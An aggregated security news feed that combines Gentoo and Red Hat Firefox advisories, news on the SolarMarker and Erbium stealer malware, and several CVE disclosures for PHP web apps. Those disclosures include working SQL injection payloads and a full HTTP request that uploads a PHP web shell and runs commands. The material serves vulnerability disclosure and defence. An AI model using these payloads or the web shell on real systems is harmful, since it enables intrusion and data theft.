Gentoo Linux Security Advisory 202209-27 - Multiple vulnerabilities have been discovered in Mozilla Firefox, the worst of which could result in arbitrary code execution. Versions less than 102.3.0:esr are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202209-27  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Mozilla Firefox: Multiple Vulnerabilities  
     Date: September 29, 2022  
     Bugs: #872059  
       ID: 202209-27

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in Mozilla Firefox, the  
worst of which could result in arbitrary code execution.

Background  
=========  
Mozilla Firefox is a popular open-source web browser from the Mozilla  
project.

Affected packages  
================  
    -------------------------------------------------------------------  
     Package              /     Vulnerable     /            Unaffected  
    -------------------------------------------------------------------  
  1  www-client/firefox         < 102.3.0:esr          >= 102.3.0:esr  
                                < 105.0:rapid          >= 105.0:rapid  
  2  www-client/firefox-bin     < 102.3.0:esr          >= 102.3.0:esr  
                                < 105.0:rapid          >= 105.0:rapid

Description  
==========  
Multiple vulnerabilities have been discovered in Mozilla Firefox. Please  
review the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All Mozilla Firefox ESR users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-102.3.0"

All Mozilla Firefox ESR binary users should upgrade to the latest  
version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-bin-102.3.0"

All Mozilla Firefox users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-105.0"

All Mozilla Firefox binary users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-bin-105.0"

References  
=========  
[ 1 ] CVE-2022-40956  
      https://nvd.nist.gov/vuln/detail/CVE-2022-40956  
[ 2 ] CVE-2022-40957  
      https://nvd.nist.gov/vuln/detail/CVE-2022-40957  
[ 3 ] CVE-2022-40958  
      https://nvd.nist.gov/vuln/detail/CVE-2022-40958  
[ 4 ] CVE-2022-40959  
      https://nvd.nist.gov/vuln/detail/CVE-2022-40959  
[ 5 ] CVE-2022-40960  
      https://nvd.nist.gov/vuln/detail/CVE-2022-40960  
[ 6 ] CVE-2022-40962  
      https://nvd.nist.gov/vuln/detail/CVE-2022-40962

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202209-27

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2022 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202209-27

The SolarMarker group is exploiting a vulnerable WordPress-run website to encourage victims to download fake Chrome browser updates, part of a new tactic in its watering-hole attacks.

Researchers have discovered the cyberattack group behind the SolarMarker malware targeting a global tax consulting organization with a presence in the US, Canada, the UK, and Europe, which is using fake Chrome browser updates as part of watering hole attacks.  

It's a new approach for the group, replacing its previous method of search engine optimization (SEO) poisoning, also known as spamdexing.

SolarMarker is multistage malware which can exfiltrate autofill data, saved passwords, and saved credit card information from victims' Web browsers.

**Preparation for a Wider Attack?**

According to an advisory published by eSentire's Threat Response Unit (TRU) on Friday, the threat group was seen exploiting weaknesses in a medical equipment manufacturer's website, which was built with the popular open source content management system WordPress.

The victim was an employee of a tax consulting organization and searched for the manufacturer by name on Google.

"This tricked the employee into downloading and executing SolarMarker, which was disguised as a Chrome update," the advisory noted.

"The fake browser update overlay design is based on what browser the victim is utilizing while visiting the infected website," the advisory added. "Besides Chrome, the user might also receive the fake Firefox or Edge update PHP page."

It is unclear whether the SolarMarker group is testing new tactics or preparing for a wider campaign, given that the TRU team has only observed a single infection of this vector type — previous SolarMarker attacks used SEO poisoning to hit people who searched online for free templates of popular business documents and business forms.

**Monitor Endpoints, Raise Employee Awareness**

The TRU advisory outlines four key steps organizations can take to reduce the impact of these kinds of attacks, including raising employee awareness regarding browser updates that occur automatically, and avoiding downloading files from unknown sites.

"Threat actors research the kind of documents businesses look for and try to get in front of them with SEO," the advisory stated. "Only use trusted sources when downloading content from the internet, and avoid free and bundled software."

The advisory also recommended more vigilant endpoint monitoring, which TRU adds will require more frequent rule updates to detect the latest campaigns, as well as enhanced threat-landscape monitoring to bolster the organization's overall defense posture.

**SolarMarker Campaigns Back After Dormant Period**

The .NET malware was first discovered in 2020 and is typically spread via a PowerShell installer, with information-gathering capabilities and a backdoor.

In October 2021, Sophos Labs observed a number of active SolarMarker campaigns that followed a common pattern: using SEO techniques, the cybercriminals managed to place links to websites with Trojanized content in the search results of several search engines.

A previous SolarMarker campaign reported by Menlo Security in October 2021 used more than 2,000 unique search terms, luring users to sites that then dropped malicious PDFs rigged with backdoors.

SolarMarker Attack Leverages Weak WordPress Sites, Fake Chrome Browser Updates

SourceCodester Best Student Result Management System 1.0 is vulnerable to SQL Injection.

**Title: Best Student Result Management System 1.0 SQLi****Author: toyydsBT123****organize: Arr3stY0u****Organization introduction : https://www.shg-sec.com/****Date: 15.09.2022****Vendor: https://www.sourcecodester.com/users/mayurik****Software: https://www.sourcecodester.com/php/15653/best-student-result-management-system-project-source-code-php-and-mysql-free-download****Version: 1.0****Reference: https://github.com/toyydsBT123/One\_of\_my\_take\_on\_SourceCodester/blob/main/Best-Student-Result-Management-System\_1.0.poc.md****Description:****The joint query injects the selected item into the query, and can obtain system information and administrator account password. The SQL injection vulnerability on this page severely compromises the security, confidentiality of the application by exposing the application to administrator level information compromise.****Status: CRITICAL****\[+\] Payloads:**

    GET
    ?nid=2' union all select null,user(),null,null-- -
    

**Proof and Exploit:**

code Firefox browser

CVE-2022-40887: One_of_my_take_on_SourceCodester/Best-Student-Result-Management-System_1.0.poc.md at main · toyydsBT123/One_of_my_take_on_SourceCodester

IBM Rational Change 5.3 is vulnerable to cross-site scripting, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability using the SUPP_TEMPLATE_FLAG parameter in a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.

CVE-2012-2160: Fix List for Rational Change

Categories: News
Tags: erbium

Tags:  malware

Tags:  data theft

Tags:  stealer

Tags:  wallets

Tags:  cryptocurrency

Tags:  browsers

Tags:  browser

Tags:  infection

Tags:  malware as a service

We take a look at reports of new data theft malware relying on sold old tricks



(Read more...)




The post Erbium stealer on the hunt for data appeared first on Malwarebytes Labs.

There’s a new slice of malware-as-a-service doing the rounds, although its actual newness is somewhat contested. The stealer, called Erbium, was first spotted on forums back in July 2022, but it seems nobody is quite sure when it started being deployed and snagging victims. Nevertheless, it is now happily causing chaos for victims as it looks to steal a sizeable portion of data from infected machines.

A slick tool with its own fully functional dashboard, its sights are set on targets not entirely dissimilar to other data stealers. System data collection, drive enumeration, and loading processes and DLLs into memory are all tell-tale signs that bad things are afoot on the target computer.

Erbium targets multiple forms of cryptocurrency wallet, along with password managing software and two-factor authentication (2FA) data. Connections are made to Discord’s Content Delivery Network in order to potentially download more malware. According to the latest research available, it leans into that well worn tactic of plundering several forms of web browser for passwords, autofill data, and also cookies. Browsers listed include Firefox, Chrome, Pale Moon, and even email client Thunderbird gets a mention.

In fact, many of the cryptocurrency wallets targeted are browser extensions. According to Bleeping Computer, this includes iWallet, Clover Wallet, Steem Keychain, ZilPay and many more. Several cold wallets are also in the malware’s crosshairs, and to top it all off it does of course have the ability to take screenshots of the victim’s desktop.

The most recent campaign described by researchers uses well worn tricks which never seem to go out of fashion. Specifically: Malware stored on free file hosting, posing as cheats or cracks. Using free file hosting for malware storage makes it easy for its operators to set up shop somewhere else, should the malware be taken down by the hosts.

The attackers are said to make use of drive-by download techniques to spread the files—a term that covers all forms of unintended software installation, such as software installed via browser exploits, or bundled with legitimate downloads. There are no more specifics, but outside of this campaign, it is very common to see these sorts of files promoted on fake Youtube videos or even in the comments under legitimate videos.

Once enough data is gathered by the malware authors, it’s off to the underground marketplaces to trade and / or sell the stolen information. Erbium has become very popular in recent months, with Bleeping Computer reporting the cost of doing business has risen from $9 per week to $100 per month.

Competition is fierce in malware-as-a-service land, but Erbium seems to be sticking around.

Users of Malwarebytes are protected from the two payloads mentioned in the Duskrise article \[1\], \[2\], and the various payloads \[1\], \[2\] listed in the Cyfirma writeup.

Stay safe out there!

Erbium stealer on the hunt for data

In Exam Reviewer Management System 1.0, an authenticated attacker can upload a web-shell php file in profile page to achieve Remote Code Execution (RCE).

    # Exploit Title: Exam Reviewer Management System 1.0 - Remote Code Execution (RCE) (Authenticated)
    # Date: 2022-02-08
    # Exploit Author:  Juli Agarwal(@agarwaljuli)
    # Vendor Homepage:
    https://www.sourcecodester.com/php/15160/simple-exam-reviewer-management-system-phpoop-free-source-code.html
    
    # Software Link:
    https://www.sourcecodester.com/download-code?nid=15160&title=Simple+Exam+Reviewer+Management+System+in+PHP%2FOOP+Free+Source+Code
    
    # Version: 1.0
    # Tested on: XAMPP, Kali Linux
    
    
    
    Description – The application suffers from a remote code execution in the
    admin panel. An authenticated attacker can upload a web-shell php file in
    profile page to achieve remote code execution.
    
    
    
    POC:-
    
    
    
    ==========
    
    # Request:
    
    ==========
    
    POST /erms/classes/Users.php?f=save HTTP/1.1
    
    Host: localhost
    
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101
    Firefox/91.0
    
    Accept: */*
    
    Accept-Language: en-US,en;q=0.5
    
    X-Requested-With: XMLHttpRequest
    
    Content-Type: multipart/form-data;
    boundary=---------------------------37791356766765055891341961306
    
    Content-Length: 1004
    
    Origin: http://localhost
    
    Connection: close
    
    Referer: http://localhost/erms/admin/?page=user
    
    Cookie: PHPSESSID=22f0bd65ef694041af3177057e7fbd5a
    
    
    
    -----------------------------37791356766765055891341961306
    
    Content-Disposition: form-data; name="id"
    
    
    
    1
    
    -----------------------------37791356766765055891341961306
    
    Content-Disposition: form-data; name="firstname"
    
    
    
    Adminstrator
    
    -----------------------------37791356766765055891341961306
    
    Content-Disposition: form-data; name="lastname"
    
    
    
    Admin
    
    -----------------------------37791356766765055891341961306
    
    Content-Disposition: form-data; name="username"
    
    
    
    admin
    
    -----------------------------37791356766765055891341961306
    
    Content-Disposition: form-data; name="password"
    
    
    
    -----------------------------37791356766765055891341961306
    
    Content-Disposition: form-data; name="img"; filename="shell.php"
    
    Content-Type: application/x-php
    
    
    
    <html>
    
    <body>
    
    <b>Remote code execution: </b><br><pre>
    
                                  <?php if(isset($_REQUEST['cmd'])){ echo
    "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
    
    </pre>
    
    </body>
    
    </html>
    
    
    
    -----------------------------37791356766765055891341961306—
    
    
    
    ================
    
    # Webshell access:
    
    ================
    
    
    
    # Webshell access via:
    
    POC: http://localhost/erms/uploads/1644334740_shell.php?cmd=id
    
    
    
    # Webshell response:
    
    Remote code execution:
    
    uid=1(daemon) gid=1(daemon) groups=1(daemon)

CVE-2022-40878: Offensive Security’s Exploit Database Archive

Online Tours & Travels Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/update_booking.php.

**Online Tours & Travels management system v1.0 by mayuri\_k has SQL injection**

BUG\_Author: Bains

Login account: mayuri.infospace@gmail.com/admin (Super Admin account)

vendors: https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /tour/admin/update\_booking.php

Vulnerability location: /tour/admin/update\_booking.php?id=, id

dbname = tour1

\[+\] Payload: /tour/admin/update\_booking.php?id=-1%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13--+ // Leak place ---> id

GET /tour/admin/update\_booking.php?id\=\-1%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=g29omi7f91g3h7ud1uhq6rbmkv
Connection: close

CVE-2022-40354: Bug_report/SQLi-3.md at main · songbingxue/Bug_report

Online Tours & Travels Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/up_booking.php.

**Online Tours & Travels management system v1.0 by mayuri\_k has SQL injection**

BUG\_Author: Bains

Login account: mayuri.infospace@gmail.com/admin (Super Admin account)

vendors: https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /tour/admin/up\_booking.php

Vulnerability location: /tour/admin/up\_booking.php?id=, id

dbname = tour1

\[+\] Payload: /tour/admin/up\_booking.php?id=-1%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13--+ // Leak place ---> id

GET /tour/admin/up\_booking.php?id\=\-1%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=g29omi7f91g3h7ud1uhq6rbmkv
Connection: close

CVE-2022-40353: Bug_report/SQLi-2.md at main · songbingxue/Bug_report

Online Tours & Travels Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/update_traveller.php.

**Online Tours & Travels management system v1.0 by mayuri\_k has SQL injection**

BUG\_Author: Bains

Login account: mayuri.infospace@gmail.com/admin (Super Admin account)

vendors: https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /tour/admin/update\_traveller.php

Vulnerability location: /tour/admin/update\_traveller.php?id=, id

dbname = tour1

\[+\] Payload: /tour/admin/update\_traveller.php?id=-1%27%20union%20select%201,database(),3,4,5,6,7,8,9,10--+ // Leak place ---> id

GET /tour/admin/update\_traveller.php?id\=\-1%27%20union%20select%201,database(),3,4,5,6,7,8,9,10\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=g29omi7f91g3h7ud1uhq6rbmkv
Connection: close

CVE-2022-40352: Bug_report/SQLi-1.md at main · songbingxue/Bug_report

Red Hat Security Advisory 2022-6700-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 102.3.0 ESR. Issues addressed include a bypass vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2022:6700-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6700  
Issue date:        2022-09-26  
CVE Names:         CVE-2022-40956 CVE-2022-40957 CVE-2022-40958   
                   CVE-2022-40959 CVE-2022-40960 CVE-2022-40962   
=====================================================================

1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 102.3.0 ESR.

Security Fix(es):

* Mozilla: Bypassing FeaturePolicy restrictions on transient pages  
(CVE-2022-40959)

* Mozilla: Data-race when parsing non-UTF-8 URLs in threads  
(CVE-2022-40960)

* Mozilla: Memory safety bugs fixed in Firefox 105 and Firefox ESR 102.3  
(CVE-2022-40962)

* Mozilla: Bypassing Secure Context restriction for cookies with __Host and  
__Secure prefix (CVE-2022-40958)

* Mozilla: Content-Security-Policy base-uri bypass (CVE-2022-40956)

* Mozilla: Incoherent instruction cache when building WASM on ARM64  
(CVE-2022-40957)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2128792 - CVE-2022-40959 Mozilla: Bypassing FeaturePolicy restrictions on transient pages  
2128793 - CVE-2022-40960 Mozilla: Data-race when parsing non-UTF-8 URLs in threads  
2128794 - CVE-2022-40958 Mozilla: Bypassing Secure Context restriction for cookies with __Host and __Secure prefix  
2128795 - CVE-2022-40956 Mozilla: Content-Security-Policy base-uri bypass  
2128796 - CVE-2022-40957 Mozilla: Incoherent instruction cache when building WASM on ARM64  
2128797 - CVE-2022-40962 Mozilla: Memory safety bugs fixed in Firefox 105 and Firefox ESR 102.3

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
firefox-102.3.0-6.el9_0.src.rpm

aarch64:  
firefox-102.3.0-6.el9_0.aarch64.rpm  
firefox-debuginfo-102.3.0-6.el9_0.aarch64.rpm  
firefox-debugsource-102.3.0-6.el9_0.aarch64.rpm

ppc64le:  
firefox-102.3.0-6.el9_0.ppc64le.rpm  
firefox-debuginfo-102.3.0-6.el9_0.ppc64le.rpm  
firefox-debugsource-102.3.0-6.el9_0.ppc64le.rpm

s390x:  
firefox-102.3.0-6.el9_0.s390x.rpm  
firefox-debuginfo-102.3.0-6.el9_0.s390x.rpm  
firefox-debugsource-102.3.0-6.el9_0.s390x.rpm

x86_64:  
firefox-102.3.0-6.el9_0.x86_64.rpm  
firefox-debuginfo-102.3.0-6.el9_0.x86_64.rpm  
firefox-debugsource-102.3.0-6.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-40956  
https://access.redhat.com/security/cve/CVE-2022-40957  
https://access.redhat.com/security/cve/CVE-2022-40958  
https://access.redhat.com/security/cve/CVE-2022-40959  
https://access.redhat.com/security/cve/CVE-2022-40960  
https://access.redhat.com/security/cve/CVE-2022-40962  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYzH0g9zjgjWX9erEAQi/KA//ZzK9nVVUCVg7lC1rep2cJtZ5GT59QqlP  
QGuCkAnW8O05DBBjHnBIMLhioph2GFGw/A4oBxWijtZXshI5GB/AdQ70GJsbrYJ6  
V7zOE/AO3QOZIWytLjm1wamuIAy2q0ffHVPXuMFyLQ7iU+1RjzEEZOALzVm8p67s  
9mxnDTchhaq+ebDkmYk3qsS83WtQwCIhvz5gu+pXbbAzt9dGg/qc0i+QVedZ0cZX  
LxvbO2F28q/NnjPEmJAWVXgG8HgR7QjmBrVGzYWMOfmXG94sVYCp/dyQy/tOHL6t  
LUZexJJwwihGpveSEDv2KiIfk7IdzSUS93yCL1k0PcU6vvRh8QR977jHYEcpHOrW  
7EsVF+0wUHde9AYaJWfNxGHOWLVbKVR4J1jHZNnfU9eFzeZcRQzXqUPy57mX6yVY  
2n7wE7J34A4Py7lH0QsZzTY0tW0ByL0WXrX63vrij5sugr4LlIZOJcf6xEPeL79A  
YS9Ggc11KvNpMZ0/9fI8fvbP3GMX+QWUWU7f6KI5LBloi+/aRE8+jx9hYtZwtTmV  
tOEqqX5T0ZMvlvEHjdeTM5SpjeInZqS/EbVArWwFjWeprKhz5prtsyApKgHXlRRw  
J1DrNnRvBAAsb5MTzn3zQMHxrl2LwujdKzEZDL2QOEOOybHu+tKGhLB1r7kVpKoZ  
q9To96uLFnE=  
=GZRD  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#firefox